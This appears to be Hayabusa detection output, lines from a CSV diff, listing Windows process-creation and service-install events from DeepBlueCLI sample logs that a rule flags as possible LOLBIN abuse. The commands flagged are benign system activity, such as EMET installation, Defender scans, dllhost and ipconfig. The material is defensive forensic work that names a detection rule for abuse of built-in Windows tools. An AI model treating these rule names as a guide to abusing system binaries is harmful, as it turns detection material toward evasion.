+2016-09-02 01:18:44.431 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1044 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 01:18:44.458 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x16d4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 02:01:48.411 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 02:01:48.594 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x1728 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 02:01:48.666 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xc08 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 02:03:48.398 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x14b8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 02:09:30.260 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdb4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 02:09:39.134 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 02:10:01.474 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1720 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 02:26:02.115 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xb0c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:00:10.327 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x7f4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:05:18.971 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x12bc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:06:54.664 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x56c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:06:54.679 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{86D5EB8A-859F-4C7B-A76B-2BD819B7A850} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:39:28.543 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12e8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:39:28.691 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11e0 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:39:28.743 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa28 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:39:28.761 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17a4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:39:28.771 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xd08 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:39:28.809 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:46:10.436 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1158 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:46:27.488 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup (1).msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0x14c8 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:46:27.704 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x2ec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:47:09.257 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc48 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:47:09.370 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x16bc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:48:01.641 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 29CF125E202451A4ADA81BD9D0C1A3B7 | Path: C:\Windows\System32\msiexec.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:48:09.250 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 22A181542763035A5FF1244203DB5EDC E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:48:18.846 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0xa48 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:48:20.301 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetTcpPortSharing restricted | Path: C:\Windows\System32\sc.exe | PID: 0x13e8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:48:20.346 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetTcpPortSharing SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:48:20.355 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Net.Tcp Listener Adapter | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe | Account: NT AUTHORITY\LocalService | Start Type: disabled,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-02 05:48:20.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetTcpActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x9e4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:48:20.379 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetTcpActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x1558 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:48:20.416 +09:00,IE10Win7,7045,info,,New Service Installed,Name: Net.Pipe Listener Adapter | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe | Account: NT AUTHORITY\LocalService | Start Type: disabled,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-02 05:48:20.426 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetPipeActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x1660 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:48:20.439 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetPipeActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x1234 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:48:20.450 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: Net.Msmq Listener Adapter | Path: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"" -NetMsmqActivator | Account: NT AUTHORITY\NetworkService | Start Type: disabled",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-02 05:48:20.460 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetMsmqActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x968 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:48:20.468 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetMsmqActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x710 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:48:22.723 +09:00,IE10Win7,7045,info,,New Service Installed,Name: ASP.NET State Service | Path: %SystemRoot%\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe | Account: LocalSystem | Start Type: disabled,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-02 05:49:59.321 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x128c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:50:05.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup (1).msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0x17e4 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:50:05.541 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1570 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:50:19.219 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4DE932ADC1206E85CE03A5855ECF29FC | Path: C:\Windows\System32\msiexec.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:50:19.686 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: Microsoft EMET Service | Path: ""C:\Program Files\EMET 5.5\EMET_Service.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-02 05:50:19.909 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 22F8D0F1805E128ED9C40EA3A4181C89 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xe78 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:50:20.040 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" copy hklm\software\microsoft\emet_up hklm\software\microsoft\emet /s /f | Path: C:\Windows\System32\reg.exe | PID: 0x59c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:50:20.058 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""regsvr32.exe"" /s ""C:\Program Files\EMET 5.5\EMET_CE.DLL"" | Path: C:\Windows\System32\regsvr32.exe | PID: 0x17d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:50:20.147 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" delete hklm\software\microsoft\emet_up /f | Path: C:\Windows\System32\reg.exe | PID: 0x13d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:50:20.214 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" copy hklm\software\policies\microsoft\emet_up hklm\software\policies\microsoft\emet /s /f | Path: C:\Windows\System32\reg.exe | PID: 0x17c0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:50:20.258 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" delete hklm\software\policies\microsoft\emet_up /f | Path: C:\Windows\System32\reg.exe | PID: 0x14cc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:53:20.687 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1598 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:53:20.767 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa1c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:53:20.804 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x364 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:53:20.815 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xf94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 05:53:20.853 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1628 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 06:24:37.363 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x16d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 06:24:37.378 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x148c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 23:08:33.005 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 23:08:33.233 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x398 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
